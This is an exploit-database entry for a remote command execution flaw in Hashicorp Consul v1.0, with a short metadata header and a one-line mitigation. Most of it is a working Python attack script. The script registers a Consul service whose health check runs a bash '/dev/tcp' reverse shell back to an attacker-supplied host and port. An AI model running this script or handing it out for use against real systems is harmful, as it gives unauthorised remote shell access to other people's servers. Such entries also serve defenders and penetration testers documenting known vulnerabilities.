Hashicorp Consul v1.0 - Remote Command Execution (RCE)

vendor:

Consul

by:

GatoGamer1155, 0bfxgh0st

9.8

CVSS

CRITICAL

Remote Command Execution (RCE)

CWE

Product Name: Consul

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE:

CPE: a:hashicorp:consul:1.0

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu Server

2022

Hashicorp Consul v1.0 – Remote Command Execution (RCE)

Exploit for gain reverse shell on Remote Command Execution via API

Mitigation:

Ensure that the Consul API is not exposed to the public internet and that authentication is enabled for the API.

Source

Exploit-DB raw data:

# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
# Date: 26/10/2022
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://www.consul.io/
# Description: Exploit for gain reverse shell on Remote Command Execution via API
# References: https://www.consul.io/api/agent/service.html
# Tested on: Ubuntu Server
# Software Link: https://github.com/hashicorp/consul

import requests, sys

if len(sys.argv) < 6:
    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")
    exit(1)

target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{sys.argv[5]}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}

try:
    requests.put(target, headers=headers, json=json)
    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
    print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")